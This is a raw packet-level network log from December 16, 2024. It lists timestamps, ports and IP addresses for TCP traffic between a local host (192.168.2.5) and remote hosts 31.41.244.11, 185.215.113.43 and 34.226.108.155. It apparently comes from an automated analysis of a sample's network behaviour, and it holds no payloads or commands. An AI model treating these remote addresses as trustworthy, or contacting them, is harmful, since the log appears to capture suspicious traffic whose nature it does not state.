Dec 16, 2024 11:03:23.220889091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.220943928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.220968962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.221019983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.222001076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.222054005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.222122908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.222172976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.223273993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.223309994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.223331928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.223361015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.224417925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.224472046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.224540949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.224591970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.225466013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.225518942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.225603104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.225651979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.226546049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.226598024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.226665974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.226773977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.227879047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.227915049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.227931023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.227966070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.228918076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.228954077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.228970051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.228996992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.230015993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.230067015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.230184078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.230232000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.231236935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.231287003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.231291056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.231342077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.232456923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.232494116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.232508898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.232539892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.233618975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.233654022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.233669996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.233701944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.234738111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.234771967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.234786034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.234813929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.235917091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.235950947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.235966921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.235992908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.237076044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.237163067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.237184048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.237209082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.238240957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.238276005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.238287926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.238333941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.239388943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.239423990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.239442110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.239460945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.240392923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.240446091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.240576982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.240628958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.241591930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.241647959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.241728067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.241780043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.244008064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.244060993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.245095968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.245147943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.245426893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.245480061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.245613098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.245662928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.245676994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.245723009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.245753050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.245760918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.246491909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.246545076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.246659040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.246711016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.247669935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.247724056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.247817993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.247862101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.248774052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.248811960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:23.248841047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:23.248857021 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:25.564651966 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:25.564934015 CET	49827	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:25.684756041 CET	80	49827	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:25.684840918 CET	49827	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:25.684901953 CET	80	49796	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:25.684981108 CET	49796	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:25.693386078 CET	49827	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:25.813559055 CET	80	49827	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:26.771176100 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:26.771203041 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:26.771308899 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:26.785064936 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:26.785080910 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:27.020872116 CET	80	49827	185.215.113.43	192.168.2.5
Dec 16, 2024 11:03:27.021042109 CET	49827	80	192.168.2.5	185.215.113.43
Dec 16, 2024 11:03:27.023598909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:27.023907900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:27.143692017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:27.143821001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:27.143966913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:27.144210100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:27.144210100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:27.264039040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470010042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470107079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470129013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470160007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470165968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470205069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470217943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470242977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470256090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470278978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470300913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470314980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470330000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470355988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470372915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470411062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470421076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470448017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.470455885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.470499039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.533154964 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.567081928 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.567111015 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.571093082 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.571201086 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.583875895 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.584245920 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.591084003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.591142893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.591178894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.591203928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.594718933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.594800949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.623855114 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.623867989 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.662631035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.662719965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.662724972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.662776947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.666623116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.666685104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.666870117 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.666919947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.670705080 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.676146984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.676201105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.676203012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.676246881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.683418036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.683476925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.683749914 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.683804035 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.692135096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.692203999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.692409992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.692462921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.700678110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.700757027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.700773954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.700820923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.708971977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.709031105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.709038973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.709076881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.717371941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.717417002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.717442036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.717463970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.725682974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.725752115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.726336956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.726393938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.733999014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.734039068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.734064102 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.734086990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.741605997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.741663933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.741673946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.741705894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.782814026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.782876015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.782880068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.782921076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.812099934 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:28.854502916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.854558945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.854568958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.854605913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.855340958 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:28.856759071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.856797934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.856812000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.856839895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.861244917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.861301899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.861337900 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.864973068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.865946054 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.866008043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.866199970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.866246939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.870609999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.870673895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.870804071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.870851040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.875427008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.875488043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.875591040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.875637054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.880274057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.880310059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.880340099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.880359888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.884808064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.884844065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.884866953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.884885073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.889458895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.889518976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.889573097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.889619112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.894037962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.894099951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.894155979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.894203901 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.898863077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.898900032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.898920059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.899085999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.903357983 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.903414965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.903479099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.903525114 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.908118010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.908153057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.908191919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.908220053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.912796021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.912832975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.912867069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.912889004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.917000055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.917037010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.917052984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.917200089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.920133114 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.920186043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.920257092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.920305014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.923715115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.923768044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.923839092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.923885107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.927402020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.927455902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.927459002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.927503109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.931309938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.931391001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.931395054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.931437016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.934922934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.934967041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.934981108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.935013056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.938565016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.938621044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.938740015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.938790083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.942318916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.942373037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.942418098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.942465067 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:28.946568012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:28.946629047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.048549891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.048614025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.048675060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.048727989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.050019979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.050077915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.050144911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.050194025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.052819967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.052875042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.052879095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.052925110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.055598974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.055639029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.055659056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.055680990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.058600903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.058639050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.058657885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.058681011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.061247110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.061284065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.061317921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.061332941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.063822031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.063879967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.063919067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.064022064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.066448927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.066499949 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.066541910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.066592932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.069457054 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.069516897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.069525957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.069567919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.072290897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.072348118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.072354078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.072395086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.074197054 CET	80	49833	31.41.244.11	192.168.2.5
